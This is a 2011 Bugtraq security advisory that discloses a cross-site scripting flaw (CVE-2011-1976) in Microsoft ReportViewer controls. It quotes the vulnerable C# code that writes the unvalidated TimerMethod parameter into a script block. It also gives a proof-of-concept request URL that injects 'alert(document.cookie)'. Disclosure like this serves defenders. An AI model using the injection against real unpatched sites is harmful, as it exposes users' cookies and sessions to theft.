lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Mon, 22 Aug 2011 14:53:12 GMT
From: info@...security.com
To: bugtraq@...urityfocus.com
Subject: Cross-Site Scripting (XSS) in Microsoft ReportViewer Controls

==================================================
Cross-Site Scripting (XSS) in Microsoft ReportViewer Controls 
Adam Bixby - Gotham Digital Science (labs@...security.com) 
Public Release Date: 8/9/2011
Confirmed Affected Software:  Microsoft Report Viewer Redistributable 2005 SP1 and Microsoft Visual Studio 2005 Service Pack 1
Browser used for testing: IE8 (8.0.7601.17514)
Severity: High
MS Bulletin: MS11-067 - http://www.microsoft.com/technet/security/Bulletin/MS11-067.mspx
CVE: CVE-2011-1976

==================================================
1. Summary
==================================================
The Microsoft ReportViewer Controls are a freely redistributable control that enables embedding reports in applications developed using the .NET Framework.  A Cross-Site Scripting (XSS) vulnerability was found in the Microsoft.ReportViewer.WebForms.dll.  The XSS vulnerability appears to affect all websites that utilize the affected controls.

==================================================
2. Technical Details
==================================================
File: Microsoft.ReportViewer.WebForms.dll (PerformOperation() method of the SessionKeepAliveOperation class)
1) User controllable data enters via the "TimerMethod" URL parameter value and is assigned to the "andEnsureParam" string variable.

string andEnsureParam = HandlerOperation.GetAndEnsureParam(urlQuery, "TimerMethod");

2) The "andEnsureParam" variable with user-controllable input is then passed into the "s" string variable which is dynamically building a javascript block.  The "s" variable is then passed to response.write(). Writing the un-validated data to the JS block creates the XSS exposure.

string s = string.Format(CultureInfo.InvariantCulture, "&lt;html&gt;&lt;body&gt;&lt;script type=\"text/javascript\"&gt;parent.{0}();&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;", new object[] { andEnsureParam });
response.Write(s);

==================================================
3. Proof-of-Concept Exploit
==================================================
This vulnerability can be exploited against websites that have deployed the vulnerable Microsoft.ReportViewer.WebForms.dll.  You will note that since the data is being written into an existing Javascript block that the attacker does not need to include any opening or closing tags (i.e.,<img>, <script>, etc) to execute code.

Reproduction Request:
https://test.com/Reserved.ReportViewerWebControl.axd?Mode=true&ReportID=&lt;arbitraryIDvalue&gt;&ControlID=&lt;validControlID&gt;&Culture=1033&UICulture=1033&ReportStack=1&OpType=SessionKeepAlive&TimerMethod=KeepAliveMethodctl00_PlaceHolderMain_SiteTopUsersByHits_ctl00TouchSession0;alert(document.cookie);//&CacheSeed=

(Note: During testing of this issue, it appeard as though a valid ControlID parameter value was needed to exploit this issue)

==================================================
4. Recommendation
==================================================
Update to the latest versions.  For more information please see http://www.microsoft.com/technet/security/Bulletin/MS11-067.mspx

==================================================
5. About Gotham Digital Science
==================================================
Gotham Digital Science (GDS) is an information security consulting firm that works with clients to identify, prevent, and manage security risks. For more information on GDS, please contact info@...security.com or visit http://www.gdssecurity.com.

Powered by blists - more mailing lists